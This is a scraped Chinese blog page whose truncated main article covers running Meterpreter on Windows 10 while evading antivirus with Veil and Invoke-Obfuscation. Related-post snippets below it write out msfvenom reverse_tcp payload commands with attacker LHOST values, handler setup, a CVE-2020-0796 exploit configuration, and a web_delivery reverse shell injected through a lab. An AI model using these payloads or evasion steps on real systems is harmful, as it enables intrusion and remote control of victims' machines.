msf win10漏洞_渗透测试 - 黑客技术 | win10内存执行meterpreter绕过杀软第二弹_吾爱漏洞...

最新推荐文章于 2024-05-29 00:07:14 发布
最新推荐文章于 2024-05-29 00:07:14 发布
阅读量934 收藏 3
点赞数
文章标签: msf win10漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40007804/article/details/111856305
版权
本文介绍了如何通过修复问题和利用Veil、Invoke-Obfuscation及 Franci Šacer的nps-payload版本,来绕过Windows Defender等杀软,成功在Win10系统中执行Meterpreter payload。详细步骤包括利用Veil去除转义字符、使用Invoke-Obfuscation混淆脚本以及生成不受检测的C# payload。
摘要由CSDN通过智能技术生成

坎宁汉姆的定律是这样的:“在互联网上获得正确答案的最好方法并不是去问一个问题,而是发布一个错误的答案”。

然而,自从我发布上篇博文《win10内存花式执行meterpreter绕过杀软》后却没有收到负面反馈,不过我自己已经发现了一些问题:

以下是我目前为止发现的:

l绝大多数杀软使用默认配置就能检测到nps_payload,因为它在后端使用了msfvenom来生成可执行的powershell代码。

l从webDAV上获取文件对磁盘并不是“零写入的”,在C:WindowsServiceProfilesLocalServiceAppDataLocalTempTfsStoreTfs_DAV这个目录中你可以找到一些内容。

lMsbuild也不是零写入的,执行的时候会在C:Users[USER]AppDataLocalTemp[RANDOM]写入一些内容。不过,跟webDAV不一样,执行之后它会自我清理。

好消息是我可以修复第一个问题,下面是修复的步骤:

使用Veil

假设你已经安装了Veil,并且使用nps_payload生成了msbuild_nps.xml文件。

使用下面的参数运行Veil:

执行后你会得到一个payload.bat文件。根据靶机架构不同,我们会复制相对应的命令。下面我对x64架构进行了高亮显示。

在上面的这段p

最低0.47元/天 解锁文章
weixin_40007804
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
吾爱漏洞网站seo整站优化分析
07-22
视频仅供学习交流 网站seo整站优化分析视频介绍:  今天有个网友与我交换友情链接,他的站域名不错,就是站内优化需要改进一下,想要优化的主词都没有体现,我以前录制过一套视频是SEO内容优化系列实战视频(1-8课) ,里面有讲到几个重点的设置, 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限
weixin_43822401的博客
05-21 1350
靶机:IP地址为,运行Windows 10 1903版本。攻击机:IP地址为。文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。
通过msf渗透win10
qq_63651088的博客
03-22 1552
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4740
win10系统攻击msf
Win10msf渗透测试,简单粗暴
m0_72774428的博客
10-22 931
因为视频太模糊了,所以我视频放网盘了 https://pan.baidu.com/s/1UFo0-llksGWHEK8s47EjbQ 密码fce8 第一步制作一个Win10的木马,代码:sudo msfvenom -p windows/meterpreter/reverse_tcpsudo -o 路径 第二步打开msf:打开监听:use exploit/multi/handler 然后设置木马:set payload windows/meterpreter/reverse_tcp 然
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
69-69.渗透测试-Linux安装MSF.mp4
05-10
69-69.渗透测试-Linux安装MSF.mp4
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
记一次msf入侵win10,并拍照
weixin_30765577的博客
05-18 2841
好久没有玩kali了,刚才看到一位大佬msf渗透win10的思路,我感觉不错,我就来复现一下 kali :192.168.45.136 win10 : 192.168.45.137 1 首先,我们查看一下kali的ip 2 生成远控马儿 最后跟着生成马儿的路径 msfvenom -platform windows -p windows/m...
msfconsole攻击win10及简陋版
最新发布
极客云曦前端
05-29 318
该错误提示表明在Metasploit中执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole。
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 641
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
msf win10漏洞_微软SMBv3 Client/Server远程代码执行漏洞CVE20200796
weixin_42659196的博客
01-06 436
01影响范围影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core inst...
记一次msf渗透win10
m0_46373658的博客
11-06 2464
KALI IP 192.168.186.141 WIN 10 192.168.186.131 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe LHOST 本地的IP地址 LPORT 反向连接到主机的端口 打开 msfconsole use exploit/multi/handler 设置模块 set payload windows/meterp
MSF Exploit入侵电脑实践(Win7/Win10皆可)
xiaohujiang的博客
07-10 5867
msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe msfven
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1426
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
msf win10漏洞_永恒之黑:CVE20200796漏洞复现
05-28
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒之黑”漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞的复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值